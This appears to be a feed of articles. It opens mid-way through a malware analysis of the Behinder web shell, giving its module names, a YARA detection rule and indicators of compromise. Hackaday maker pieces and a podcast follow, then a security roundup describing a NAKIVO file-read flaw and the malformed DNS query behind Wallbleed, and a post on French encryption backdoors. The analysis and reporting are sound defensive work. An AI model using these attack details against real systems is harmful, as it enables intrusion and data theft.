LoadNativeLibrary.dll
Loader.dll
Plugin.dll
PortMap.dll
RealCMD.dll
RemoteSocksProxy.dll
ReversePortMap.dll
SocksProxy.dll
Transfer.dll
Utils.dll
Module filenames
Those familiar with the toolkit used may have already identified it by looking at these filenames, but if not, it is also possible to infer the relationship by simply pivoting to the samples available on VT:
Sample FC793D722738C7FCDFE8DED66C96495B relations on VT
Behinder, also known as Rebeyond, Ice Scorpion, 冰蝎 (Bīng xiē), is known as a cross-platform web shell designed to be compatible with most popular web servers running PHP, Java or ASP.NET as in our investigation. Although the web shell sample itself is very lightweight and somewhat basic, the tool includes a powerful GUI for operators with numerous capabilities including loading additional modules and giving them full control over compromised environments.
Its built-in AES-encrypted communication allows threat actors to maintain stealthy control over a compromised web server, often bypassing traditional network detection mechanisms, and its modular, flexible nature allows malicious actors to use it as a base for customization even though it is only available as a pre-built tool on GitHub. Moreover, the presence of several step-by-step Chinese language tutorials on CSDN (Chinese Software Developer Network) makes it widely accessible to opportunistic bad actors.
The bigger picture
Taking a step back, the relationship between the memory artifacts observed on the customer’s server during the post-exploitation phase and the web shell source code becomes evident. The web shell is not just a foothold, it’s a fully functional backdoor that facilitates encrypted communication with the operators’ infrastructure, allowing them to call built-in or custom-loaded libraries, deploy additional tools, conduct reconnaissance and exfiltrate data while remaining hidden:
ASPX web shell side by side with .NET payload
Although the Behinder web shell has been widely discussed in the past, especially the PHP and JSP variants, it is still a current and evolving cyberweapon. Even if attackers make mistakes or act carelessly by reusing the same encryption keys or exhibiting the same patterns, we can’t afford to let our guard down. In the incident described in this article, if we had not taken the time to dig deeper into the artifacts observed in memory, we likely would have missed the toolkit altogether.
Threats evolve quickly, and signature-based malware detection only catches what we already know. Underestimating the potential of memory-based payloads can lead to a false sense of security. Teams may assume that if they haven’t detected any suspicious files, they are safe, when in fact threats may be actively operating in memory.
For SOC teams, continuous learning, proactive threat hunting, and refining detection techniques are essential to staying ahead of adversaries.
Happy hunting and see you on the next mission!
YARA rule
rule dotnetFrozenPayload
{
    strings:
        $CorDllMain_mscoree_dll = {00 5F 43 6F 72 44 6C 6C 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C 00}
        $EnjsonAndCrypt = {00 45 6E 6A 73 6F 6E 41 6E 64 43 72 79 70 74 00}
        $getExtraData = {00 67 65 74 45 78 74 72 61 44 61 74 61 00}
        $extraDataMagicArray = {00 7E 7E 7E 7E 7E 7E 00} // 0x00, the six 0x7E (126) bytes, 0x00
    condition:
        uint16(0) == 0x5A4D and
        filesize < 400000 and
        $CorDllMain_mscoree_dll and
        (
            $EnjsonAndCrypt or
            (
                $getExtraData and $extraDataMagicArray
            )
        )
}
Indicators of compromise
File paths
C:\ProgramData\DRM\
C:\Users\Default\Videos\
A Different Take on the River Table Does it in Bronze
River tables are something we’ve heard decried as passé, but we’re still seeing some interesting variations on the technique. Take this example done with bronze instead of epoxy.
Starting with two beautiful slabs of walnut, [Burls Art] decided that instead of cutting them up to make guitars he would turn his attention to a river table to keep them more intact. Given the price of copper and difficulty in casting it, he decided to trim the live edges to make a more narrow “river” to work with for the project.
Since molten copper is quite toasty and wood likes to catch on fire, he wisely did a rough finish of the table before making silicone plugs of the voids instead of pouring metal directly. The silicone plugs were then used to make sand casting molds, and a series of casting trials moving from copper to bronze finally yielded usable pieces for the table. In case that all seems too simple, there were then several days of milling and sanding to get the bronze and walnut level and smooth with each other. The amount of attention to detail and plain old elbow grease in this project is impressive.
We’ve seen some other interesting mix-ups of the live edge and epoxy formula like a seascape night light or this river table with embedded neon. And if you’re looking to get into casting, why not start small in the microwave?
youtube.com/embed/slu4A4L0bqo?…
Cheap Fiber Optic Wand Toy Becomes Tiny Weird Display
If you’ve ever seen those cheap LED fiber optic wands at the dollar store, you’ve probably just thought of them as a simple novelty. However, as [Ancient] shows us, you can turn them into a surprisingly nifty little display if you’re so inclined.
The build starts by removing the fiber optic bundle from the wand. One end is left as a round bundle. At the other end, the strands are then fed into plastic frames to separate them out individually. After plenty of tedious sorting, the fibers are glued in place in a larger rectangular 3D-printed frame, which holds the fibers in place over a matrix of LEDs. The individual LEDs of the matrix light individual fibers, which carry the light to the round end of the bundle. The result is a tiny little round display driven by a much larger one at the other end.
[Ancient] had hoped to use the setup for a volumetric display build, but found it too fragile to be fit for purpose. Still, it’s interesting to look at nonetheless, and a good demonstration of how fiber optics work in practice. As this display shows, you can have two glass fibers carrying completely different wavelengths of light right next to each other without issue.
We’ve featured some other great fiber optic hacks over the years, like this guide on making your own fiber couplings. Video after the break.
youtube.com/embed/zz59e1wWyVc?…
[Thanks to Zane and Darryl and Ash for the tip! This one was all over the tipsline!]
Low-Resolution Fluid Simulation On An ESP32
Fluid simulations are a key tool in fields from aerospace to motorsports and even civil engineering. They can be three-dimensional and complicated and often run on supercomputer clusters bigger than your house. However, you can also do simple two-dimensional fluid simulations on very simple hardware, as [mircemk] demonstrates.
This build is almost like a simple toy that displays particles rolling around and tumbling as you turn it one way or the other. Behind the scenes, an ESP32 is running the show, simulating a group of particles responding to gravity in a fluid-like manner. The microcontroller is hooked up with a 3-axis gyroscope and accelerometer, which it uses to track motion and influence the motion of the particles in turn. The results of the simple fluid simulation are displayed on a screen made up of a 16 x 16 matrix of WS2812B addressable RGB LEDs, which add enough color to make the build suitably mesmerizing.
There’s something compelling about turning the display and watching the particles tumble and flow, particularly when they’re all set to different colors. [mircemk] also gave the build the ability to operate in several different modes, running “sand,” “liquid” and “gas” simulations and with dynamic coloring to boot.
We’ve seen some great videos from [mircemk] before, too, like this sensitive metal detector rig.
youtube.com/embed/AwRup7wAijU?…
Tech in Plain Sight: Shopping Cart Locks
The original locking wheel.
Shopping carts are surprisingly expensive. Prices range up to about $300 for a cart, which may seem like a lot, but they have to be pretty rugged and are made to work for decades. Plastic carts are cheaper, but not by much.
And carts have a way of vanishing. We’ve seen estimates that cart theft costs hundreds of millions of dollars worldwide annually. To stem the tide, stores sometimes pay a reward to people to round up carts off the street and return them to the store — it’s cheaper than buying a new one. That led [Elmer Isaacks] to patent a solution to this problem in 1968.
The [Isaacks] system used lots of magnets. A cart leaving the store had a brake that would be armed by running over a magnet. Customers were expected to follow a path surrounded by magnets to prevent the brake from engaging. If you left the track, a rod passing through the wheel locked it.
A third magnet would disarm the brake when you entered the store again. This is clever, but it has several problems. First, you have to insert magnets all over the place. Second, if someone knows how the system works, a simple magnet will hold the brake off no matter what.
The original modern-style cart from a 1946 patent.
There are some low-tech ways to stop theft, too. For example, if the store has barriers too narrow for the carts to pass, customers can’t leave the store. That’s not very nice if you are trying to get a week’s worth of stuff to your car. You sometimes see poles on carts rising taller than the door, to prevent the cart from leaving the building, which, of course, has the same problem.
Some stores, particularly Aldi, require a small deposit to get a cart. You get the deposit back when you return the cart. This not only discourages theft but also cuts down on having to hire kids to round up carts in the parking lot. The problem is that the deposit is usually a low-denomination coin, so if you really want to steal a $200 shopping cart, losing a quarter is probably not much of a deterrent.
Higher Tech
Building on the [Isaacks] solution, more modern systems use a perimeter fence — usually a wire, but sometimes magnets — that causes the brake to engage if you roll the cart over it.
This drives the cost up and is expensive to install. Worse, if you only have one wheel lock, a smart customer could lift that wheel off the ground and bypass the virtual fence. That means you probably want two locking wheels, although that still doesn’t preclude a strong thief or two thieves from carrying the cart over the line. You can see a breakdown of what’s happening in the Science Channel video below.
youtube.com/embed/PWZOeM5jdjg?…
Smart cart locks can also help solve “pushout,” an industry term for people filling a cart and walking out without paying. A properly equipped cart can determine if it exits the store without going through a checkout line. This is probably error-prone and not foolproof, but it might stop many pushouts.
youtube.com/embed/e7KzPQrzY-c?…
Where’s the Hack?
Many common carts use 7.8 kHz signals on the sensing wire. Since that’s within the range of audio, you can actually hack them pretty easily.
A DEFCON presentation shows how you can use your phone to lock and unlock shopping carts. Not that we suggest you do that. As [Joseph Gabay] notes: “I never really wanted a shopping cart, but…I have the knowledge that if I wanted a shopping cart, I could have one.” His video below shows many of the internal details of some of the common shopping cart systems.
youtube.com/embed/fBICDODmCPI?…
Who Knew?
You’d think a shopping cart was about the simplest thing you’d deal with all day. But, like many things these days, it conceals some very high-tech electronics. And it seems like there should be some better options. Locking wheels might be fine when you have someone actually stealing, but if you ever have a cart lock up while you are moving quickly, it isn’t pleasant.
If you become super interested in shopping carts, the National Museum of American History has a section of shopping carts. Why not? People get obsessed with strange things. If the modern system seems familiar, maybe you are thinking of invisible doggie fences. If you want to hack a cart, you probably want to buy your own to start with.
Featured image: “Large Capacity Shopping Cart” from the National Museum of American History collection.
Hackaday Podcast Episode 310: Cyanotypes, Cyberdecks, and the Compass CNC
This week, Hackaday’s Elliot Williams and Kristina Panos met up in a secret location with snacks to bring you the latest news, mystery sound, and of course, a big bunch of hacks from the previous week.
First up in the news, and there’s a lot of it: we announced the Hackaday Europe 2025 workshops and a few more speakers, though the big keynote announcement is still to come. In case you missed it, KiCad 9 moved up into the pro league, and finally, we’re hiring, so come join us in the dungeon.
On What’s That Sound, Kristina didn’t get close at all, but at least had a guess this time. That’s okay, though, because nobody got it right! We’re still giving a t-shirt away to [Dakota], though, probably because Elliot has a thing for using random number generators.
Then it’s on to the hacks and such beginning with a beautiful handheld compass CNC and cyanotype prints made with resin printer’s UV light. After that, we take a look at open-source random numbers, a 3D-printed instant camera, and a couple of really cool cyberdecks. Finally, we discuss whether DOOM is doomed as the port of choice in this day and age, and kvetch about keyboards.
Check out the links below if you want to follow along, and as always, tell us what you think about this episode in the comments!
html5-player.libsyn.com/embed/…
Download in DRM-free MP3 and savor at your leisure.
Episode 310 Show Notes:
News:
- Hackaday Europe 2025: Workshops And More Speakers
- KiCad 9 Moves Up In The Pro League
- We’re Hiring: Come Join Us!
What’s that Sound?
- Congrats to [Dakota] who drew lucky number 13 and a Hackaday Podcast t-shirt!
Interesting Hacks of the Week:
- Handheld Compass CNC Lets Teensy Do The Driving
- Cyanotype Prints On A Resin 3D Printer
- Open-Source Random Numbers
- 3D Print An Instant Camera
- Harvesting Water With High Voltage
- A Precisely Elegant Cyberdeck Handheld
Quick Hacks:
- Elliot’s Picks:
- Pico Gets A Speed Bump
- A Web-Based Graphics Editor For Tiny Screens
- To Test A (Smart) LED
- Import GPU: Python Programming With CUDA
- SHOUT For Smaller QR Codes
- Kristina’s Picks:
- 3D Print Yourself A Split Flap Display
- The Perfect Pi Pico Portable Computer
- Infill Injection Experiment Makes Stronger Parts
Can’t-Miss Articles:
- What Game Should Replace Doom As The Meme Port Of Choice?
- Keebin’ With Kristina: The One With All The Green Keyboards
hackaday.com/2025/02/28/hackad…
Lost Foam Aluminium Alloy Casting
[Kelly Coffield] makes intake manifolds for old Ford throttle bodies for fun, demonstrating an excellent technique for making such things in the small shop. The mould patterns are CNC machined from a solid polystyrene block, with all the necessary gates to feed the aluminium into the mould. The principle is to introduce aluminium from a large central runner into the mould structure, which feeds the gates into the mould parts. The various foam mould components are then glued with an extra brace bar at the bottom to strengthen it.
Dip coating with a refractory slurry
The complete structure is then sprayed with surfactant (just plain old soapy water) and dip-coated in a refractory slurry. The surfactant adjusts the coating’s surface tension, preventing bubbles from forming and ruining the surface quality produced by this critical coating step.
Once a satisfactory coating has been applied and hardened, the structure is placed inside a moulding pan fitted with a pneumatic turbine vibrator, to allow sand to be introduced. The vibrations ease the flow of sand into all the nooks and crannies, fully supporting the delicate mould structure against the weight of the metal, and gases produced as the foam burns away. A neat offset pouring cup is then added to the top of the structure and packed in with more sand to stabilise it. It’s a simple setup that can easily be replicated in any hackerspace or backyard for those motivated enough. [Kelly] is using A356 aluminium alloy, but there’s no reason this technique won’t work for other metals.
It was amusing to see [Kelly] demould by just dumping out the whole stack onto the drive and throwing the extracted casting into a snow bank after quenching. We might as well use all that free Midwest winter cooling capacity! After returning to the shop, [Kelly] would typically perform any needed adjustments, such as improving flatness in the press, while the part was in the ‘as cast temper’ condition. We’ll gloss over the admission of cutting the gates off on the table saw! After these adjustments, the part is artificially aged to a T5-like specification, to give it its final strength and machinability properties. There are plenty more videos on this process on the channel, which is well worth a look.
Aluminium casting is nothing new here; here’s a simple way to cast using a 3D printed pattern. But beware, casting aluminium can be hazardous, it does like to burn.
youtube.com/embed/zxFAhnvXzys?…
Thanks to [Chuck] for the tip!
This Week in Security: Malicious Themes, Crypto Heists, and Wallbleed
It’s usually not a good sign when your downloaded theme contains obfuscated code. Yes, we’re talking about the very popular Material Theme for VSCode. This one has a bit of a convoluted history. One of the authors wanted to make some money from all those downloads. The original Material Theme was yanked from the VSCode store, the source code (improperly) re-licensed as closed source, and replaced with freemium versions. And this week, those freemium versions have been pulled by Microsoft for containing malware.
Now there’s a quirk to this story. No one has been able to answer a simple yet vital question: What exactly did the theme plugin do that was malicious? The official response is that “A theming extension with heavily obfuscated code and unreasonable dependencies including a utility for running child processes”. Looking at the official statements and unofficial security reviews, I can’t find confirmation that the plugins have actually been observed doing something malicious. The only concrete problem is that the plugin shipped obfuscated JavaScript. There are several incomplete statements about a problem with a sanity.io dependency that may have been compromised.
The conclusion at this point is that a thorough security review of these plugins has not been published. The Microsoft team found enough problematic elements in the plugins to trigger pulling them. But I join the chorus of voices calling on Microsoft to clearly answer the vital question: Have any users of Material Theme plugins actually been compromised?
Low-hanging Backups
NAKIVO backup has an interesting endpoint, the getImageByPath call that’s used for loading the system’s logo, and is accessible for unauthenticated users. It’s pretty simple, just taking a path to a file on the appliance filesystem, and returning the byte array for use as an image. And of course, it doesn’t check whether the requested file is actually an image. Nor is it limited to a list of allowed paths.
So we essentially have an arbitrary file read. It’s not entirely arbitrary, as the file is first loaded into memory before being served. So the backups themselves are likely too big to successfully exfiltrate in this way. There are still some rather interesting targets, including the system logs. But the real juicy target is the system database itself. Thankfully, the user credentials for the NAKIVO system itself seem to be properly hashed to avoid casual theft. But setting up useful backups will require all sorts of integrations, like SSH and AWS credentials. And those are stored in plain text inside the database. Whoops.
Apple Did What?
A couple of weeks ago we talked about Apple and the UK government having a tussle over iCloud backup encryption. Apple has finally rolled out end-to-end encryption for those backups, and the UK’s Snooper’s Charter has been used to require Apple to add an encryption backdoor in that system. That’s problematic for multiple reasons, and Apple has opted to not quietly oblige the UK government. You may have seen headlines that Apple has pulled access to the new Advanced Data Protection (ADP) for UK users. This seems to be the next step of anti-compliance with the new UK rule.
The logic here seems to be that not offering any end-to-end encrypted backup system for UK users is a better choice than claiming to offer such a system that actually contains a backdoor. That’s doubly true, as the law in question doesn’t seem to limit itself to UK users. If the UK government doesn’t back down on their extremely questionable demands, the next major step may be for Apple to pull sales from the country entirely.
Crypto Heist
We have a pair of crypto heist stories this week, with the first one being the largest in history. At a staggering $1.5 Billion, this seems like the biggest single theft of any kind to ever be successfully pulled off. And the details of how it was done are still a bit murky. The funds were stolen out of a Bybit “multisig” cold wallet. Those are clever currency stores that actually include smart contracts in the storage mechanism, requiring multiple owners to sign off on transactions.
It’s believed that this hack was pulled off by North Korean agents, through the use of very clever but simple techniques: Social engineering, and UI manipulation. In essence, a request for digital signature that claimed to do something benign, that actually unlocked the funds for theft. Some things never seem to change.
And that’s not all that’s happening with Cryptocurrency these days. It turns out that there’s another dead-simple attack that is targeting job-seeking individuals, instead of huge companies. “We may have a job for you, go to this website and run this application to apply!” Rather than a legitimate videoconferencing or interviewing application, the download is a simple backdoor. It’s used primarily to find crypto wallets and siphon the funds out.
Wallbleed
Remember Heartbleed? That’s the glitch in OpenSSL from 2014, where the TLS heartbeat implementation could trivially leak large amounts of system memory. Wallbleed is a strangely similar bug in the implementation of the Chinese Great Firewall system. One way the Great Firewall does censorship is via DNS injection. Request the DNS information for a blocked domain, and the firewall will intercept that request in real time, and return a spoofed response with a bogus IP address for the requested domain. Importantly for this discussion, that spoofing is bi-directional. You can send DNS requests to Chinese IP addresses, and get spoofed responses from the Great Firewall.
DNS request and response packets use an interesting variable-length encoding, where the domain name being requested is turned into a sequence of length-value pairs. example.com is represented as 07example03com00: 7 bytes for the domain, then 3 bytes for the TLD, and a terminating null. Many of us immediately wonder what happens if that query is packed incorrectly, say 07example20com00. There aren’t actually 20 bytes in the query, so what do various DNS responders do when handed such a query? Well-written DNS servers recognize that this is garbage and just drop the packet. Some of the Great Firewall infrastructure did something far more interesting: it spoofs the DNS response, and performs a buffer over-read when constructing it, leaking a few bytes of raw system memory back to the requester, à la Heartbleed.
And when we say “a few bytes”, the maximum observed leakage in a single spoofed response was 125. As you might imagine, that’s quite a bit of data. Enough data, in fact, to learn quite a bit about the Great Firewall and what sort of traffic it sees. There were also what appeared to be x86_64 pointers and Linux stack frames.
This attack was first discovered by researchers in 2021 and finally completely fixed in March 2024. In the intermediate time, those researchers used the vulnerability quite heavily to mine the Great Firewall infrastructure for data. This is an interesting ethical question. Normally it’s considered completely unacceptable to weaponize a vulnerability beyond what’s needed as a proof of concept. The Great Firewall is in some ways an adversarial device, making exploitation a bit murkier. On the other hand, vulnerabilities like this are usually disclosed in order to get them fixed. What is a researcher’s responsibility in this case, when the vulnerability is in a censorship device? It seems the Chinese authorities discovered the Wallbleed vulnerability themselves, excusing researchers from needing to fully answer this particular ethical question.
Bits and Bytes
It’s not surprising to open up an electronic device, and find an ugly glob of potting compound spread over one or several of the key chips inside. Or for some devices, the compound is ubiquitous, covering everything. [Graham Sutherland] has some thoughts on how to defeat the stuff. And while some is obvious, like using a drill press to very carefully expose a target interface, there are some really inventive ideas I would never have considered, like throwing an entire board into a pressure cooker for an hour!
How long does it take for a cyber criminal to go from initial access on an internal machine, to full access to a privileged computer? In the ReliaQuest case, it was 48 minutes. The hack was simple and clever. Start a mass spam and phishing campaign, and then pose as a helpful IT worker who could help end the carnage. All it takes is one employee to fall for the fake help desk routine, and 48 minutes.
Let’s say you wanted to pirate music from a streaming service like Deezer, but you really didn’t want your IP address or machine associated with the piracy. What would you do? Use Tor? VPNs? How about create a malicious PyPI package that does your downloading for you. That seems to be the bizarre case of automslc, a reasonably popular package that secretly downloads and scrapes from the music platform.
The Winds of Mass Surveillance Sweep Across Europe! France Too Wants Backdoors to Bypass Encryption
France is preparing to pass laws that could upend online security, requiring telecommunications providers to install backdoors in encrypted messaging apps and restricting access to Internet resources over VPNs. The initiative has drawn sharp criticism from Tuta (formerly Tutanota) and from the VPN Trust Initiative (VTI).
The first controversial bill is an amendment to the French anti-drug-trafficking law that would require encrypted communication services to hand law enforcement the decrypted messages of suspects within 72 hours of a request. Non-compliance would carry fines of up to 1.5 million euros for individuals and up to 2% of annual global turnover for companies. Although the law is not yet in force, it has already been approved by the French Senate and will move on to examination by the National Assembly.
Tuta has called on lawmakers to reject the amendment, arguing that weakening encryption would create vulnerabilities not only for criminals but also for ordinary users. The company points out that even if a backdoor is created in the interest of law enforcement, it can be used by cybercriminals and government agencies alike. Tuta also stressed that such initiatives violate EU data protection law (GDPR) as well as German cyber security standards.
At the same time, France is weighing another measure: an obligation for VPN services to block access to pirate sites. The media group Canal+ and the French football league (LFP) launched an initiative to that effect, asking Internet providers and VPN services to restrict access to certain web resources.
The VPN Trust Initiative (VTI), which includes AWS, Google, Cloudflare, Namecheap, OVH, IPVanish VPN, Ivacy VPN, NordVPN, PureVPN and ExpressVPN, condemned such a move, stating that the fight against piracy must not lead to censorship and the violation of users’ rights. In its open letter, the organization drew parallels between the initiative and the Internet restrictions imposed in other countries, including China, Myanmar and Iran, stressing that such measures set a precedent for mass censorship.
France is not the only country where control over Internet data is tightening. In the United Kingdom, the government recently demanded that Apple provide access to encrypted iCloud backups. In response, the company switched off its end-to-end encryption option for UK users. In Sweden, a bill is being prepared that would oblige the messaging services Signal and WhatsApp to create technical backdoors providing access to encrypted messages.
News has also recently emerged that Europol chief Catherine De Bolle wants to work with major technology companies to expand cooperation with law enforcement on encryption matters. In her view, refusing such cooperation could pose a threat to European democracy.
The article “The Winds of Mass Surveillance Sweep Across Europe! France Too Wants Backdoors to Bypass Encryption” comes from il blog della sicurezza informatica.